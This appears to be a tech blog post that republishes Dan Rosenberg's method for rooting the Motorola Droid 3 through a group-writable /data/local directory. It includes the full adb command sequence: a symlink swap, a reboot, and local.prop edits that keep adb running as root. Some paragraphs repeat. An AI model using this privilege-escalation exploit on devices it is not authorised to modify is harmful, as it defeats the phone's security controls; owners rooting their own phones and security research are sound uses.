Share
The Motorola Droid 3 has finally been rooted and it didn’t even require the developer to physically access a Motorola Droid 3 device… quite impressive. While auditing the Droid 3 device, Dan Rosenberg found out that the content of /data/local was group “shell” and group writable and all it took to root the device was to modify some of its content using adb. Find out more after the break.
Disclaimer: Please note that we will not be responsible if you end up bricking your device. Rooting or customizing your device can be risky, if you follow the instructions you should be fine!
Again all the credits go to Dan Rosenberg or djrbliss for identifying the security vulnerability and writing the exploit.
Here is a quick explanation from the developer of the security hole [from Rooting the Droid 3]:
Once the vulnerability was found it became quite easy to actually root / jailbreak the Motorola Droid 3 using ADB [from Rooting the Droid 3]:
Disclaimer: Please note that we will not be responsible if you end up bricking your device. Rooting or customizing your device can be risky, if you follow the instructions you should be fine!
Again all the credits go to Dan Rosenberg or djrbliss for identifying the security vulnerability and writing the exploit.
Here is a quick explanation from the developer of the security hole [from Rooting the Droid 3]:
I identified a vulnerability specific to Motorola devices in the script parsed by the init thread (this is existing code, not commands for you to run):Now the screenshot:
mkdir /data/local 0771 mot_tcmd shell mkdir /data/local/tmp 0771 mot_tcmd shell mkdir /data/local/12m 0771 mot_tcmd shell mkdir /data/local/12m/batch 0771 mot_tcmd shell chown mot_tcmd shell /data/local chown mot_tcmd shell /data/local/12m chown mot_tcmd shell /data/local/12m/batch chown mot_tcmd shell /data/local/tmpSince the contents of/data/localare group “shell” and group-writable, we can modify the contents of this directory using ADB. By logging into the device and replacing one of the sub-directories listed here with a symbolic link, then when the device reboots it will change the ownership of the symlink target to group “shell”. This can be used to edit property files to manipulate the behavior of ADB to achieve root.
Once the vulnerability was found it became quite easy to actually root / jailbreak the Motorola Droid 3 using ADB [from Rooting the Droid 3]:
Log in to the device using “adb shell” and type the following commands:
mv /data/local/12m /data/local/12m.bak ln -s /data /data/local/12mNext, physically reboot the device by pressing the power button. When it wakes up, log in using “adb shell” again, and type the following:
rm /data/local/12m mv /data/local/12m.bak /data/local/12m mv /data/local.prop /data/local.prop.bak echo "ro.sys.atvc_allow_netmon_usb=0" > /data/local.prop echo "ro.sys.atvc_allow_netmon_ih=0" >> /data/local.prop echo "ro.sys.atvc_allow_res_core=0" >> /data/local.prop echo "ro.sys.atvc_allow_res_panic=0" >> /data/local.prop echo "ro.sys.atvc_allow_all_adb=1" >> /data/local.prop echo "ro.sys.atvc_allow_all_core=0" >> /data/local.prop echo "ro.sys.atvc_allow_efem=0" >> /data/local.prop echo "ro.sys.atvc_allow_bp_log=0" >> /data/local.prop echo "ro.sys.atvc_allow_ap_mot_log=0" >> /data/local.prop echo "ro.sys.atvc_allow_gki_log=0" >> /data/local.propThero.sys.atvc_allow_all_adbproperty is a Motorola-specific configuration that prevents ADB from dropping its root privileges. Reboot the device one final time, and on logging in with “adb shell”, you should be presented with a root prompt. Enjoy!
Don't forget to follow us on Twitter and join our Facebook Fan page to stay updated.